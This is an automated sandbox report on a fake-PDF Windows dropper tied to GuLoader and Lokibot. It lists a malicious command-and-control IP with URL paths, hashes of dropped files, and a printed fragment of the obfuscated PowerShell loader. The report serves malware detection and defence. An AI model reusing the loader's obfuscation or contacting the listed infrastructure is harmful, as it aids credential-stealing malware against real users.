                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.185.193
                  		drive.usercontent.google.comUnited States
                  		15169GOOGLEUSfalse
                  45.61.136.239
                  		unknownUnited States
                  		40676AS40676UStrue
                  142.250.186.110
                  		drive.google.comUnited States
                  		15169GOOGLEUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1466694
                  Start date and time:2024-07-03 09:40:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 4s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  renamed because original name is a hash value
                  Original Sample Name:BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021pdf.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@6/16@2/3
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 66%
                  • Number of executed functions: 89
                  • Number of non-executed functions: 40
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 3424 because it is empty
                  • Execution Graph export aborted for target wab.exe, PID 7572 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:40:58API Interceptor40x Sleep call for process: powershell.exe modified
                  05:28:29API Interceptor14x Sleep call for process: wab.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  45.61.136.239RFQ KTH02-07-2024#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/posts.php?file=1951649854775
                  Obavestenje o deviznom prilivu.Pdf.cmd.exeGet hashmaliciousLokibotBrowse
                  • 45.61.136.239/index.php/gyr.php?id=1
                  Purchase Order 02.07.2024.PDF.cmd.exeGet hashmaliciousLokibotBrowse
                  • 45.61.136.239/index.php/gyr.php?id=1
                  SeAH RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/ajax.php?view=1
                  UTN RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/ajax.php?view=1
                  PLANT PROJECT PROPOSAL BID_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/posts?post=3046046175911
                  Document BT24#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/54596186971079
                  Quote Request (Tupy S.A.) 523AM - 924BR#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/posts.php?file=1951649854775
                  148512_171.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/gyr.php?id=1
                  PLANT PROJECT PROPOSAL BID_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239/index.php/posts?post=3046046175911

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AS40676USRFQ KTH02-07-2024#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239
                  #Inv_PI29467018.pdf.vbsGet hashmaliciousUnknownBrowse
                  • 41.216.183.13
                  Obavestenje o deviznom prilivu.Pdf.cmd.exeGet hashmaliciousLokibotBrowse
                  • 45.61.136.239
                  Purchase Order 02.07.2024.PDF.cmd.exeGet hashmaliciousLokibotBrowse
                  • 45.61.136.239
                  orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 41.216.183.13
                  FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                  • 41.216.183.13
                  statement .xlsGet hashmaliciousUnknownBrowse
                  • 41.216.183.13
                  Lu4qSit8YR.elfGet hashmaliciousUnknownBrowse
                  • 172.107.78.124
                  SeAH RFP_24-0676#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 45.61.136.239
                  zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                  • 41.216.183.13

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19Inquiry Studbolt - 240703.vbeGet hashmaliciousGuLoaderBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  RFQ KTH02-07-2024#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  AF85714759_htm#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  Zapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  file.exeGet hashmaliciousVidarBrowse
                  • 142.250.185.193
                  • 142.250.186.110
                  FmQx1Fw3VA.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 142.250.185.193
                  • 142.250.186.110

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):8003
                  Entropy (8bit):4.840877972214509
                  Encrypted:false
                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                  MD5:106D01F562D751E62B702803895E93E0
                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ttdd45s.dxf.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0fvh05u.yf0.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\twinsomeness\Chamorro.Saf

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):357596
                  Entropy (8bit):7.578666564556752
                  Encrypted:false
                  SSDEEP:6144:2MogbL4bQ2wc5Sl6Eji4QohsqvuZcshPhJWzIxEMy4ytr3O5MVm:doAuTY24QootW0E4ytr3O54m
                  MD5:4278592189A8CF3B0CC374530489B451
                  SHA1:D940EFC32E83C28CDA2944328990BF003A4FCEF5
                  SHA-256:CE8EC891957BFF40554B1AE1C98EADBCD5E22E435E6002F0153E84F0E9C03B8D
                  SHA-512:026C66B10DBBEF0A018EAA6922D065DB009BDDE3FA064A63C68D659543CA5CEAE232E77BDDAE4A6D0284A6F5801A1EA1AF31EC8DB88906D9AD530DC6964F1B0B
                  Malicious:false
                  Reputation:low
                  Preview:.....kkk.....&&.(.z...\.NN...u...YY.)...L.....b.....................................!.............6............###...qq...................)............._.O..............................HH.............@......8........rrr.y.FFF......J.......T....................-..k..%%%....>.........NN.......h...............p........................................GGGG.+++..................................y...............................qq.`...m...m.+........,,,..R.....PPPP....TTT.........................~...B............b.....||..........$..9............ffff..E....................GG.....B.................;.....k..........._.......kkk.......$$.......................qq..k..Y...6....pp.......00........2....VVV...........pp..'...........9.@.)......ii............JJJ.............[.....m.....999........................................k.j.gg...............6......@...................."""...........))).......................DD........].............;;;..W...i...........uu.........6.M....NNN. .t......555..........

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:dropped
                  Size (bytes):935680
                  Entropy (8bit):7.058103503655126
                  Encrypted:false
                  SSDEEP:12288:fBfOreq6OBi6FVd5cw6HETDVVKmuqCsV2qpqfyl0fGXJ9BqNJowksVz:lOreq6O9FRc2xVS5WEO0fG5vq7H
                  MD5:811A6608BD141B5C41CCEAA9D1E7EE52
                  SHA1:63EE2D9A226ADA53731204F906F5030CB6A28076
                  SHA-256:1DE20AB31A930A9F60A323AD35C4A0D670FC457CEE78357D099784487BD8C9EB
                  SHA-512:A27BECB13D18FA4EB4C634BA2FB780505BADD210FA380951948DA1C9E56471649773786A2C0F35F889AA19981043F03375B10477B4B7B1FE10461DCEDD8CA6CB
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 16%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L...#.MX.................b....:......3............@...........................C......%....@...........................................=............h................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data.....9..........z..............@....ndata...@....:..........................rsrc........=.....................@..@................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe:Zone.Identifier

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Peripatecically200.par

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1380109
                  Entropy (8bit):0.2965766731960955
                  Encrypted:false
                  SSDEEP:768:z6vdVSQtNfCAR8D6/nO6kL9xaMs+tZ0n7iB+PfImH+CJF/9nvM0ECzP5RJvVOhx9:UlO
                  MD5:A44437EB03194D7232A624199B2DF6FB
                  SHA1:86CB2D6F010C0E68BDA58F24E385511B609EA8DC
                  SHA-256:FC305E7D2081AC8FD9BEA9DEFD115F7BDF5AE8E5E1237A366B07EA755280CFF3
                  SHA-512:0879342C1922B0EFC098E60ACADC586B5C2632402AF84B9BD9CFD250FC8B7BFE20480F0C85613A7134AC4113469A0216571383C033FB20552438FF33BBCFF137
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................#..................................................;............................................................................................................................................................................................................b.......y................................................................................................................$...1................................................................................................................................................................................................................q........................................................................................................................................h................

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):70673
                  Entropy (8bit):5.222558493361939
                  Encrypted:false
                  SSDEEP:1536:TROkFu5rPlVAX3rL7kVjfU2gtwgkvkz7gSORFLWNsgi:TROkFBX3rMjfFgGygSOjtD
                  MD5:20AA894E99916487D81DBE300B79FC2E
                  SHA1:ADC74679240E54C6C18BB8AECFEBDD0BE6C83BA2
                  SHA-256:0B52C1FA9332130FF96449B7B0449C15F46E707029232E6B73933BA39195E723
                  SHA-512:CF2FBC0A23487B5EECBD3320981A7606B1725239EBF06D4059850DC3F1D444D6BB4E38C4E5E3BD59D0B5A95D73E3AECCC30290682543D3735FDCA8DFF81E4593
                  Malicious:true
                  Preview:$Concubitancy=$Slagelsesalmacaans;<#Stedsangivelser Bagskrm Fluster Phonogramme #><#Spermatophorous Ynglepladsen Hardtacks Reformat Unattentive Subwoofer Telephotographed #><#Prfabrikation Unpartial Henstandsordningen Instrumentality Desulfuriser Glucosid #><#Inquired Kravlende Trygleris #><#Cirkapriserne Hazzans Terminsrente superadmirableness Plouked Cottidae Stemningslejernes #><#Reovercharge pluckiness Dollfish #>$oannes = "Stregsp;Bogbind`$SosieomSUforgaetCooghnea St,reotBe,rabbsArthrosk,onopidaPeachics Pip,rasR tfrdieGaleode=O,timer`$ B.adinSbibeholpConstruiepipubinMissis.d GraaneeulyssearTra.sitoHet rotkDa dledkKartoteeFuks,ub;Ma rootFCissersujeopardnL.ksusgc DispartKopp,vaipostordoSteno.inlsnings E,thronEIn ocenxConuseeeTheatrimSyrerespHenl,gelUvanligiLkkersufMe.lemeimikr,focSkaktpoaLebbekctSpaitsfireproduo.ivreginargumensStep.an Skemati(Skyldfl`$ChemicsFBrankedu Oblat.nEarmarknDeletereFunderelLiveplaiPrimingn,ystolig Medlem,,lberth underbo`$Exun atPStnkekoaCordelir onglotDeci

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\blokkryptografimetoderne.une

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):546961
                  Entropy (8bit):0.3003993023166451
                  Encrypted:false
                  SSDEEP:768:rAPoZNdc+xT+jN4VKQKkWyIN5/cJzad9FB1ev:oE
                  MD5:099CA0F2593851035CFC6F57AA233E64
                  SHA1:D487C62E5FA635C78AD7E415F471D00B1F4CC9FF
                  SHA-256:04DC6295D043275E66F8106244A202E3DAD8E3FBA62347DBE8CCC91B496570DF
                  SHA-512:F2AF47845762C9EF3EAE55819B315245917D69D424428E018A35BF289AB4D5EF8F06D5FD4368C1E93F51511ECD5B0C79336ED50F0CB1F5E4CB644EFE1B24AB21
                  Malicious:false
                  Preview:.................................................................w...................................................................................q........................................................................................................................................................^............................................................%...................................D...................F.................................................................*...................................................................................................................................................................................................................................................................................................................................................................[..............................................................................................................................................................

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\bundgrnsens.tan

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):767051
                  Entropy (8bit):0.29627994613035125
                  Encrypted:false
                  SSDEEP:768:1uKKQWjZuz6wrOhDQ7XMNseKNuTNmgDawfwlAlEfOqpxj9mwyjP:oZUXU
                  MD5:C06E93EDE50AFE41BF3E112D1B5A11D3
                  SHA1:C589D45941BADD3FCDCFF09C4B9898B6641DCECB
                  SHA-256:E1D90119D6D38B3B041B46287A60970EE31CEE5341CB49C1115D2B54255FD221
                  SHA-512:80E29591F15DD8AADD6B9A6C3FC1DCF29C46ECFAEABDEF2006525498EDF7214B2F67A2BC9D8C52D00FF2361D37491FDA14757EEC6BBDAD82B2714C1A7E7CB310
                  Malicious:false
                  Preview:.....k........................................................................................................................................................................~........................................................................................................................................................................................M.........................................................................................................................................................................................................................t.......................X......s...............................................................................................H.......................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\handelskamrene.txt

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):493
                  Entropy (8bit):4.265610699322908
                  Encrypted:false
                  SSDEEP:12:mUNgTJemdi8Sv4a9zaqCA9y2UWoUte89B0LVbBOFyLEDgkL9:mdtdxSvx9za3rva1+hkL9
                  MD5:916EBCF44522B23FB0B3B2CAAD9A33DA
                  SHA1:3E38AD4F618591AE7B8E57D1DC081DB91A59629F
                  SHA-256:0BD2B81C28A6C12299C6B3635E00922A6ED9946C95560E91CFABB3D96BA47CE6
                  SHA-512:4DF8967D7BEEBDBC486F415A9C212DB820205312F472A8E9BC9561D81E61E694CA1A58AE6BF8C2490F89337E8C491F6C39A4B4D1EA4FF0813CDC2217596A35FA
                  Malicious:false
                  Preview:praedefinerede negeringsfunktionernes tredveaarsfdseldage skydemodstands finanskrisen irreparable..girandole uhviskhedernes synkefrdig donna,fundamental spartelmasses chymist spiserne semiplume..folkedomstole terraqueousness taknemligheds drtrin slievovitsers hustankenes..andresen fryseskab sknlitteraturerne bybefolkning ankylosing vgtafgiften dissimile.dermatopsy dialystely gonococcic lnmodtagerforholdets misgernings polos sydboernes suburban underbd bankoplysning oesophageal faconerne..

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\huse.got

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):961935
                  Entropy (8bit):0.2969741295763117
                  Encrypted:false
                  SSDEEP:768:FxrLhS9LDE7a0bTIlOZXfjN7ksdqPYEdjKL+UH6q42m6yIrMnFTT0SE87ezGon1e:Gc0SV
                  MD5:4F229F17A06BFAA9637EBA9D45AA8ABA
                  SHA1:9AD4D65710F7814949CB2014919F6566E46BA954
                  SHA-256:1E4514350D46E16DE7B6D60BFD11FB32C5A8DAB39279534073064403D6DCB84B
                  SHA-512:9FEC0DFBB4284F1C9DFF577AF810CF6FD70ED9A4248BA0D78CF1C6552260D7CD1CC1E09F62EC269EE65769B25FE1E7C4B05801CB6C89205FB296727E2ED9A700
                  Malicious:false
                  Preview:..........................................................................................................................................................................................X............................................................................................................................................................................................I...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(............................................................

                  C:\Users\user\AppData\Local\twinsomeness\Pissoirers\rognfiskenes.sid

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):620315
                  Entropy (8bit):0.296622075661877
                  Encrypted:false
                  SSDEEP:768:aD0cT5XXq1EntSlVQuimnPf+J+iy+TqkJK1yXxUJpQB1r9inhG:2
                  MD5:17FD47BA873B2CF93E57E6D38B7B3D9E
                  SHA1:D723B7753FD8576A641CFF0AB2DC27E8D89BF2DA
                  SHA-256:8C2335B4493DDFC7C0D99AF3ED4F266B02CF338878CE9B63634BCC7513E721DD
                  SHA-512:1AC7C3438A9FB89FD0A5830DECEDAC0CA597B145DDAC9CC8187312304B5387B39EC66B4E072A62F907AA48A282D287073D21BCCD3DB0E735F745C571ABA25DD3
                  Malicious:false
                  Preview:............................................................................................................................................................................................................................-......................................................................................m............................................................................................................................................................................... ..............................................................................................................................................................................................................a.....................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\188E93\31437F.lck

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):50
                  Entropy (8bit):1.5212424590621707
                  Encrypted:false
                  SSDEEP:3:/lvlp:p
                  MD5:C851BF93667BDD6310D56581D955C2AE
                  SHA1:8FC5AEC1542BD7471BF815632863622EFE23A834
                  SHA-256:3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
                  SHA-512:D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
                  Malicious:false
                  Preview:........................................user.

                  C:\Users\user\Music\veterinarians.lnk

                  Download File
                  Process:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                  Category:dropped
                  Size (bytes):970
                  Entropy (8bit):3.1809799138209813
                  Encrypted:false
                  SSDEEP:12:8wl0OsXMlykXMX+qcDhd6NRAY5lWRNNMkXg1Q1glAkwjC+YNENH4t2YZ/elFlSJm:8Vr/+hMNflWWcKleBogdqy
                  MD5:A127FF8F74778C1BF96C0582317069FE
                  SHA1:26A069959D00DF2B9799BDCE4BF47623854BD9BD
                  SHA-256:D1CF987D72CD0101E90ED32352DC6B8347BF354947455625ADE1A6A6A0E0EC98
                  SHA-512:9F77DED88B1C68332D0B6EED48DD24F67540EC3F08D4AC936DBA36FE1E11BC4126943367A3A11AC3102D7EEAC8389ED2EFBC5E5325F13A917E6C61F4CDD3152B
                  Malicious:false
                  Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....P.1...........Music.<............................................M.u.s.i.c.....\.1...........teoretisk.D............................................t.e.o.r.e.t.i.s.k.....z.2...........Connotational12.Cur.X............................................C.o.n.n.o.t.a.t.i.o.n.a.l.1.2...C.u.r...".......\.t.e.o.r.e.t.i.s.k.\.C.o.n.n.o.t.a.t.i.o.n.a.l.1.2...C.u.r.8.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.w.i.n.s.o.m.e.n.e.s.s.\.P.i.s.s.o.i.r.e.r.s.............)...........q..K.m.H..B" ..C)...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.058103503655126
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  File size:935'680 bytes
                  MD5:811a6608bd141b5c41cceaa9d1e7ee52
                  SHA1:63ee2d9a226ada53731204f906f5030cb6a28076
                  SHA256:1de20ab31a930a9f60a323ad35c4a0d670fc457cee78357d099784487bd8c9eb
                  SHA512:a27becb13d18fa4eb4c634ba2fb780505badd210fa380951948da1c9e56471649773786a2c0f35f889aa19981043f03375b10477b4b7b1fe10461dcedd8ca6cb
                  SSDEEP:12288:fBfOreq6OBi6FVd5cw6HETDVVKmuqCsV2qpqfyl0fGXJ9BqNJowksVz:lOreq6O9FRc2xVS5WEO0fG5vq7H
                  TLSH:9B15177E1BA7B997C0283731D85A2070135C2E49F7B82CEEB75A32B155746102EADD3E
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L...#.MX.................b....:......3............@

                  File Icon

                  Icon Hash:556965335969650b

                  Static PE Info

                  General

                  Entrypoint:0x403311
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x584DCA23 [Sun Dec 11 21:50:27 2016 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                  Authenticode Signature

                  Signature Valid:false
